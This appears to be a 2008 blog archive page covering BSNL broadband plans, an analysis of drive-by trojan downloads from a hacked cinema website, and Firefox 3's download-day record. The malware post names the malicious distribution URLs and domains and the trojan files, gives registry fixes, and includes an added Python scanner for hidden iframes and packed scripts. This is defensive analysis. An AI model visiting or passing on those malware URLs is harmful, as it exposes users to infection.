Jul 16, 2008

Broadband for Rs125/- only

Focus of the post:- BSNL broadband for Rs125

BSNL Plan Advisor:-
BSNL Home 125 - I want you Naked
BSNL Home 250 - Empty your pockets
BSNL Home 500 - One Night at Call Centre
BSNL UL 750 - Hit Me 
BSNL Home 1000 - Out of Mind
BSNL Home 1800 - Inutile
BSNL Home 3300 - There are some plans money can't buy

Some popular sites designed for the plan:-
m.gmail.com
m.orkut.com
wap.yahoo.com
mobile.rediff.com
wap.google.com
bbc.co.uk/mobile
mosh.nokia.mobi


The plan was launched in the first quarter of 2008. After getting an Airtel BB connection in Jan 08 I never dug into broadband plans any more, and spotted this one through a Preity Zinta ad in Hindustan Times.

Startup cost - Download limit is ridiculous at 150MB. It should have been 400-450MB, plus you have to shell out some extra amount for the modem too. Airtel and Reliance give you a free broadband modem and most of their plans are zero rental [pay only when you call]. For most of the BSNL plans the total startup cost will be a little high if you don't plan to use the landline. There are only a few plans with zero fixed monthly charges for telephone:-
  • Home 500 Combo [DL - 1.5GB, 256kbps-2mbps]
  • Home UL 750 plus [DL - Unlimited, 256kbps]
  • Home UL 1350 plus [DL - Unlimited, 512kbps]
DataOne Tariff

Jul 11, 2008

3 mins of innocent browsing on the Wild Wild Web

Focus of the post:- Drive-by downloads via malicious JavaScript and iframe tags.


The hacked page of cinema-systemsindia.com, self-proclaimed India's leading cinemagazine, leads to a couple of silent trojan downloads. At the time of writing the post the trojans aren't detected by any of the major antivirus firms except NOD32 (scan). AVG AV with its Link Scanner completely fails here. Internet Explorer users get completely owned, but Google and Firefox 3 users are warned about the malicious content on the page.



                                                                                                       
Using an updated antivirus isn't a sufficient solution for a Windows desktop system; the most surprising thing is that all the trojans downloaded from the hacked URL were not detected by any of the major AVs (scan1). The inbuilt heuristic scanning is pretty useless.
Malware Stats (Kaspersky names) 
havp2d.exe - 3/30 (-)  
tpzhzx.exe - 7/33 (-)  
svchddd.ex - 10/33 (Trojan-Spy.Win32.Zbot.dag)  
file.bat - 5/33 (Trojan-Proxy.Win32.Small.mu)  
lphcp1uj0egl5.exe - 8/33 (-)  
scchost.exe - 16/33 (Trojan-Proxy.Win32.Small.sl)  
index.exe - 11/33 (-)  
blphct1lj0ec4c.scr - 6/33 (-)  
phcp1uj0egl5.bmp - 3/33 (-)
winlogon.exe - 5/33 (Trojan-Proxy.Win32.Small.st)

Charitable IP's 
87.118.117.138/ho.php (Trojan-Downloader.JS.Iframe)  
neiron2009.com/check/vers155.php?q=1 (Trojan-Downloader.Win32.Winlagons.vb)

Google and Firefox 3 prevented the malicious loading of the url.  
The Google Diagnostic Page stats on the cinema-systemsindia.com page:-

What happened when Google visited this site? Of the 33 pages we tested on the site over the past 90 days, 11 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/08/2008, and the last time suspicious content was found on this site was on 06/06/2008. Malicious software includes 12 trojan(s). Successful infection resulted in an average of 7 new processes on the target machine. Malicious software is hosted on 3 domain(s), including sum4count.net, 78.109.30.0, try-count.net. 1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including gate4clicks.net.

Spyware Wallpaper - The malware hides the wallpaper tab in Display Properties to prevent you from changing the wallpaper. To bring it back, make the following change in the registry:-

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoDispBackgroundPage"=dword:00000000

Fake Sysinternals Screensaver

A modified fake Sysinternals Blue Screen of Death screensaver with a progress bar is installed by the malware. To prevent you from changing the screensaver, the malware hides the screensaver tab in Display Properties. Make the following registry change:-

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoDispScrSavPage"=dword:00000000

Malicious obfuscated JavaScript; complete dissection of the URL is here

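A static check for the two markers this post describes on a compromised page, an invisible iframe and an inline script that evals a long encoded string. This is an added example, not code from the original post; the class and function names, the thresholds and the sample page (with its .example hosts) are constructed for illustration.

```python
import re
from html.parser import HTMLParser

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
DYNAMIC_EXEC = re.compile(r"\b(?:eval|unescape)\s*\(|document\.write\s*\(", re.I)
LONG_TOKEN = re.compile(r"[A-Za-z0-9@_%+/=]{80,}")  # long run of encoded-looking text

class DriveByScanner(HTMLParser):
    """Flags iframes a visitor cannot see and scripts that eval packed data."""
    def __init__(self):
        super().__init__()
        self.findings, self._script = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            # A 0- or 1-pixel dimension or a hidden style means the frame is invisible.
            reasons = [f"{d}={a[d].strip()}" for d in ("width", "height")
                       if re.fullmatch(r"\s*[01](px)?\s*", a.get(d, ""))]
            if HIDDEN_STYLE.search(a.get("style", "")):
                reasons.append("hidden style")
            if reasons:
                self.findings.append(("hidden-iframe", a.get("src", ""), reasons))
        elif tag == "script":
            self._script = []  # start collecting inline script text

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script), None
            if DYNAMIC_EXEC.search(body) and LONG_TOKEN.search(body):
                self.findings.append(("packed-script", body[:30], ["eval of long encoded string"]))

def scan(html):
    scanner = DriveByScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page, not the page analysed in the post.
SAMPLE = (
    '<html><body><h1>Cinema news</h1>'
    '<iframe src="http://ads.example/banner.html" width="468" height="60"></iframe>'
    '<iframe src="http://gate.example/in.php" width=1 height=0 style="visibility:hidden"></iframe>'
    '<script>document.title = "ok";</script>'
    '<script>function dec(x){var r="";/* decode loop */eval(r)}dec("' + "x9Kq" * 40 + '")</script>'
    '</body></html>'
)
```

The scan only looks at markup as served; iframes written into the page by a script at runtime need a rendered DOM to be seen.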


Jul 4, 2008

Firefox lovers set Guinness World Record - Series of events

Focus of the post:-Series of events
  • Mozilla started a campaign on May 28 to set a Guinness World Record for the most software downloads in 24 hours with its Firefox 3 browser. The Firefox community was asked to pledge to download the browser on Download Day.
  • GOAL (Mozilla FAQ): Do we have to reach a specific number of downloads in order to set the record? This is the first record attempt of its kind so there is no set number. We'd really like to outdo the number of Firefox 2 downloads on its launch day, which was 1.6 million. Let's shoot for 5 million--the sky is the limit!
Mozilla enthusiasts worldwide drove more than 1.7 million pledges to download Firefox 3 on Download Day, hosted regional download “fests,” and informed more than 43 million people through hosting Download Day affiliate buttons online.

Firefox community email
  • The Mozilla servers were down for a few hours on the download day. Read the minute-by-minute status update on CNET. "Thanks to overwhelming demand we’ve passed through 14,000 downloads a minute! This will put us well into the tens of millions of downloads in a 24 hour period if we can sustain it. Each download is about 7MB so that’s around 13 Gigabits/s of just download traffic. Not too shabby!", the Mozilla site said.
The download day started on June 17, 2008 at 17:00 UTC/GMT (22:30 IST).
  • Five hours after the release of Firefox 3, a security firm, DV Labs/TippingPoint, reported a critical vulnerability to Mozilla affecting Firefox 3.0 as well as prior versions of Firefox 2.0.x. The vulnerability could allow an attacker to execute arbitrary code when a user visits a malicious link. The same firm recently published an advisory related to the Motorola RAZR JPG Processing Stack Overflow Vulnerability. The advisory will only be published once the vulnerability is patched by Mozilla.
  • At their busiest, the servers were handling more than 9,000 downloads per minute. Within five hours the number of downloads for version 3.0 exceeded the 1.6 million mark set by Firefox 2.0 in October 2006.
  • India download count too low @ 489,889 downloads for the download day. US @ 7,734,930; China @ 721,524; Iran @ 535,796; North Korea @ 000





  • World Record confirmed by Guinness on July 3, 2008 (Press Release): "We did it! We set a Guinness World Record. Thanks to the support of the always amazing Mozilla community, we now hold a Guinness World Record for the most software downloaded in 24 hours. From 18:16 UTC on June 17, 2008 to 18:16 UTC on June 18, 2008, 8,002,530 people downloaded Firefox 3 and are now enjoying a safer, smarter and better Web"
  • Mozilla FAQ about the validity of the record:-

What does Mozilla have to provide Guinness to validate the record? We will provide the following:

1. Signed statements of authentication from our judges showing that we've followed the rules and confirming our numbers.
2. Video footage and photographs of our community members hosting Download Fests. Take pictures!!
3. Download logs for a sample size of our downloads. We will internally host 10% of the downloads, retaining all of the logs for these downloads, and will use this as our sample set to extrapolate the actual download number and percentage of completed downloads.




